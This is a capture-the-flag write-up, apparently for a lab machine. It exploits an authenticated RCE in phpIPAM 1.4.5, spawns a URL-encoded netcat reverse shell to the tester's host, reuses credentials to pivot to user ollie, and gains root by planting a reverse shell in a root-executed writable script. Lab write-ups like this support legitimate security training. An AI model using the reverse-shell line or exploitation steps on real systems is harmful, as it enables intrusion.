Target IP: 10.10.237.226
Challenge Description:
Performing an nmap scan shows there are three TCP ports open on the target machine, as shown above.
Performing an aggressive nmap scan against the three open TCP ports returns the result above. I will start enumeration with the application on port 1337 first.
Port 1337: Application
I connected to the application on port 1337 on the target machine via nc. This application seems to provide the credentials admin:OllieUnixMontgomery! for an administration panel. The next step is to locate this administration panel.
Port 80: HTTP
Browsing to this port displays the login webpage above. Can I use the credentials admin:OllieUnixMontgomery! here? Another interesting information is the application & version of this CMS is phpIPAM IP address management [v1.4.5].
I know phpIAM 1.4.5 is vulnerable to authenticated RCE, as shown above. Before firing any exploits against the target machine, I wish to enumerate this machine further.
Using the credentials admin:OllieUnixMontgomery!, I logged in successfully as shown above. I enumerated the application to find any useful files, but I did not find anything useful.
I downloaded the exploit from this link, and ran it against the target machine using the command python3 exp.py -url http://10.10.237.226/ -usr admin -pwd OllieUnixMontgomery! --shell. This exploit opened a simple shell that I can use to perform RCE, as shown above. Time to elevate this to a more stable reverse shell connection.
I started a listener on port 8443 on my machine. Then using the exploit's shell, I deployed the URL-encoded reverse shell script rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff to the target machine and obtained a reverse shell connection on my machine at port 8443, as shown above. Now I have a foothold on the target machine with the session as www-data.
The config.php located at /var/www/html contains the credentials phpipam_ollie:IamDah1337estHackerDog! of the database application running at port 3306. However, I am unable to connect to the database application.
Running cat /etc/passwd shows there is a user called ollie. Trying to switch to this user ollie using the password IamDah1337estHackerDog! does not work; however, the password OllieUnixMontgomery! does, as shown above -- this user like to reuse their passwords. I successfully elevated my privileges from the user www-data to ollie. Time to obtain root privileges.
Running the command find / -writable -type f 2>/dev/null shows an interesting entry called /usr/bin/feedme.
Running ls -la /usr/bin/feedme shows the user ollie has rw permissions. Using cat, I viewed the contents of this file and obtained the result above. This script is interesting.
I transferred pspy64 to the target machine and ran it. I obtained the interesting result above. It looks like the script feedme gets executed as the user root. And from previous enumeration, I know I have write permission over it too; meaning, I can put my reverse shell script inside it.
In the picture above, the text highlighted in green is the reverse shell script I put inside feedme. Then I started a listener on port 8444 on my machine to catch this shell.
And now I have a root reverse shell connection on port 8444, as shown in the picture above in bottom terminal. Now I have root access on the target machine :)
The user.txt flag is shown above.
The root.txt flag is shown above.